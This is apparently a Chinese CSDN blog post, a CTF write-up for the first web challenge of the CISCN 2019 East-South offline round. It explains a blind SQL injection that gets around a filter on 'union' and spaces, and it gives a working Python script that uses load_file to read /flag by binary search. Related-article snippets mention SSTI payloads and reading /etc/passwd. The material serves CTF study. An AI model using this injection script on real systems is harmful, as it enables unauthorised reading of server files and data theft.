ciscn2019 华东南赛区线下赛WEB第一题

最新推荐文章于 2024-02-28 21:29:25 发布
最新推荐文章于 2024-02-28 21:29:25 发布
阅读量1.2k 收藏
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38677814/article/details/93907521
版权

题目过滤了union 和大量的sql函数,本意是想让人读文件,当时心太急了没做出来,现在复习一下,脚本很简单,利用的是ascii的字符串比较 如
select load_file('/flag')>='A'
select load_file('/flag')>='AB'
select load_file('/flag')>='ABC'
select load_file('/flag')>='ABCD'
简单利用这个逻辑可以写出一个二分的做法
直接看代码吧

import requests
url = 'http://localhost/index.php'
def func(x):
	x = x.replace(' ','/**/')
	return x
flag = ''
def check(mid,mystr):
	username = """hack' or binary (select load_file('/flag'))>='{0}'#"""
	username = func(username)
	username = username.format(mystr)
	password = 'hack'
	r = requests.post(url=url,data={'username':username,'password':password})	
	return 'success' in r.content
		
for i in range(1,20):
	left = 0
	right = 255
	while left < right:
		mid = (left+right+1)>>1
		if check(mid,flag+chr(mid)):
			left = mid
		else:
			right = mid-1
	flag += chr(left)
	print flag
god_speed丶
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
cisco 第四学期第一章试及答案
07-11
cisco, 第四学期,第一章,试,答案,试百分之百正确
[CISCN2019 华东赛区]Double Secret
Sk1y的博客
02-08 1055
[CISCN2019 华东赛区]Double Secret 知识点:SSTI,RC4加密 文章目录[CISCN2019 华东赛区]Double Secret解过程参考链接 解过程 打开环境,提示secret 尝试secret路由,提示会加密 GET方式传参url/secret?secret=1,回显 传参url/secret?secret=11111,报错 传入的参数secret会被RC4解密,而此时也存在python2.7的模板注入漏洞render_template_string if(s
[CISCN2019 华东赛区]Web11
Hopeace的博客
10-14 360
目名:[CISCN2019 华东赛区]Web11 作者:Hopeace 靶场地址:https://buuoj.cn/challenges#[CISCN2019%20%E5%8D%8E%E4%B8%9C%E5%8D%97%E8%B5%9B%E5%8C%BA]Web11 知识点:Smarty模板注入,注入点的选取 0x01浏览目 Ip Address API 应该是一个查看IP的接口 Why use?第一个是越权访问,第二个是隐藏个人信息 Api Usage - API URI Type Samp
[CISCN2019 华北赛区 Day2 Web1]Hack World 1 目分析与详解
最新发布
2302_79800344的博客
02-28 860
【代码】[CISCN2019 华北赛区 Day2 Web1]Hack World 1 目分析与详解。
[CISCN2019 华东赛区]Web11 1
shinygod的博客
03-23 2567
知识点:smart ssti 思路 根据下面的三张图提示,可以看出是smart ssti,在XFF处构造payload,在做前先了解一下啥是smart。 --------------------------------------------------------------------------------------------------------------- ----------------------------------------------------------------
思科第一学期期末测试复习 B
07-03
思科第一学期期末测试复习 B 英文版 答案准确
cisco第四学期第2章试答案试
07-11
cisco, 第四学期,第2章,试,答案,试百分之百正确
cisco选择答案第一单元
12-24
可以帮助你做选择,基本涵盖了第一单元 可以帮助你做选择,基本涵盖了第一单元
cisco第二学期1-5章测试和答案
04-20
cisco 第二学期1-5章测试和答案 cisco 第二学期1-5章测试和答案 cisco 第二学期1-5章测试和答案 cisco 第二学期1-5章测试和答案 cisco 第二学期1-5章测试和答案
BUUCTF之[CISCN2019 华东赛区]Web11 ------ SSTI注入
weixin_44632787的博客
06-23 1472
BUUCTF之[CISCN2019 华东赛区]Web11 知识点 SSTI smarty X-Forwarded-For 目 于是开始BurpSuite抓包和添加X-Forwarded-For:127.0.0.1 emmmmmm其实一开始添加完这个就不知道怎么做了,后来去看了别人的WP有提示SSTI和smarty这两个词。心想,这个不是最近才做过类似的目嘛。。。哎!我居然没想到! 所以开始尝试一下:X-Forwarded-For:{7*8} 获取当前目录有那些文件:X-Forwarded-F
BUUCTF [CISCN2019 华东赛区] Web11
Senimo
12-23 597
BUUCTF [CISCN2019 华东赛区] Web11 考点: 根据页面提示,应该是一个类似IP查询的网站,根据**XXF(X-Forwarded-For)**判断
web buuctf [CISCN2019 华东赛区]Web11
weixin_44214568的博客
04-07 434
知识点:1.SSTI(smarty模板) 2.XFF 1.开: a.目标明smarty,这是用php编写的比较著名的模板引擎,猜测很可能和模板注入有关系 b.提示xff 2.利用bp抓包,添加xff并尝试模板注入 很明显存在SSTI 3.改payload={system('ls')} 分别cat没有flag 猜测可能在目录下面 'cat ../../../flag'(前面有几个../需要挨个试一下) flag{3941b25d-8279-47eb-...
[CISCN2019 华北赛区 Day2 Web1]Hack World
Knsec
06-01 435
[CISCN2019 华北赛区 Day2 Web1]Hack World
[CISCN2019 华东赛区]Web4
JJT
05-14 690
[CISCN2019 华东赛区]Web4 进入环境,只有一个链接,点进去是百度 但是这个url似乎暴露了些什么 http://8c38a640-615b-48e3-9cf7-a6c197cd2ab8.node3.buuoj.cn/read?url=https://baidu.com,分别试一下url=/etc/passwd url=file:///etc/passwd url=local_file:////etc/passwd,发现file:回应了nohack,另外两个打开了文件。 然后可以尝试读
[buuctf][CISCN2019 华北赛区 Day2 Web1]Hack World
qq_37301470的博客
11-28 938
[CISCN2019 华北赛区 Day2 Web1]Hack World 分析 打开环境发现这个 All You Want Is In Table 'flag' and the column is 'flag' 还有个输入框 随便输一个数字1 返回 Hello, glzjin wants a girlfriend. 肯定是sql注入没跑了,而且要查找flag表下的flag字段 由于提交前后url没有变化,所以是通过POST方法提交了参数id。 打开hackbar模拟post过程 发现输入3 or 1=1
思科设备模拟web服务web服务器是什么
05-02
思科设备模拟Web服务Web服务器是一种...思科设备模拟Web服务Web服务器可以作为网络设备的一部分,例如交换机、路由器和防火墙,以提供Web服务和管理网络通信。它也可以作为独立的服务器,提供Web服务和管理网络连接。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值